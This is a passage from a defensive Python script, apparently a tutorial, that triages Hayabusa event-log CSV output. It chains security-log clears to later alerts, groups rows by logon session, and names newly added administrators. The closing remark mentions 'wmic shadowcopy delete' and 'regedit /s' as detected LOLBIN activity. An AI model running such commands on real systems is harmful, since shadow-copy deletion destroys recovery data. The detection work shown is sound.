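        if sep:
            out[key.strip()] = value.strip()
    return out


def load_rows(text):
    """Parse Hayabusa CSV text into dicts with an aware datetime and a
    parsed Details dict, sorted by time (csv handles the doubled quotes)."""
    rows = []
    for r in csv.DictReader(io.StringIO(text)):
        r["ts"] = datetime.strptime(r["Timestamp"], TS_FMT)
        r["fields"] = parse_details(r["Details"])
        rows.append(r)
    rows.sort(key=lambda r: r["ts"])
    return rows


def find_clear_then_alert(rows, window=timedelta(minutes=30), min_level="medium"):
    """For each 1102 Security Log Cleared alert, list the alerts of at least
    `min_level` raised on the same host within `window` afterwards. An account
    that wipes the log and then keeps acting is the pattern worth escalating."""
    chains = []
    for c in (r for r in rows if r["EventID"] == "1102"):
        follow = [r for r in rows
                  if r["Computer"] == c["Computer"]
                  and c["ts"] < r["ts"] <= c["ts"] + window
                  and SEVERITY.get(r["Level"], 0) >= SEVERITY[min_level]]
        chains.append({"host": c["Computer"], "cleared_at": c["ts"],
                       "user": c["fields"].get("User"),
                       "followed_by": [r["RuleTitle"] for r in follow]})
    return chains


def by_logon_session(rows):
    """Group rows by (Computer, LID). LID is the Security-log Logon ID, so rows
    sharing it were produced under the same logon session."""
    sessions = defaultdict(list)
    for r in rows:
        lid = r["fields"].get("LID")
        if lid:
            sessions[(r["Computer"], lid)].append(r)
    return sessions


def resolve_new_admins(rows):
    """A 4732 (member added to Administrators) row carries only the SID; join
    it to the 4720 (account created) row with the same SID to get the name."""
    created = {r["fields"]["SID"]: r["fields"]["User"]
               for r in rows if r["EventID"] == "4720" and "SID" in r["fields"]}
    return [(r["Computer"], created.get(r["fields"].get("SID"), "<unknown>"))
            for r in rows
            if r["EventID"] == "4732" and r["fields"].get("Group") == "Administrators"]


ROWS = load_rows(SAMPLE_CSV)

if __name__ == "__main__":
    for chain in find_clear_then_alert(ROWS):
        print(f"{chain['host']}: log cleared by {chain['user']} at {chain['cleared_at']}, "
              f"then {len(chain['followed_by'])} alert(s): {chain['followed_by']}")
    for (host, lid), session in by_logon_session(ROWS).items():
        print(f"{host} LID {lid}: {[r['EventID'] for r in session]}")
    for host, name in resolve_new_admins(ROWS):
        print(f"{host}: new local administrator {name}")
```

Lowering `min_level` to `"low"` pulls the `wmic shadowcopy delete` and `regedit /s` process creations into the chains as well; the default keeps the output short by dropping the LOLBIN rows, which Hayabusa itself rates low because they fire on plenty of legitimate administration.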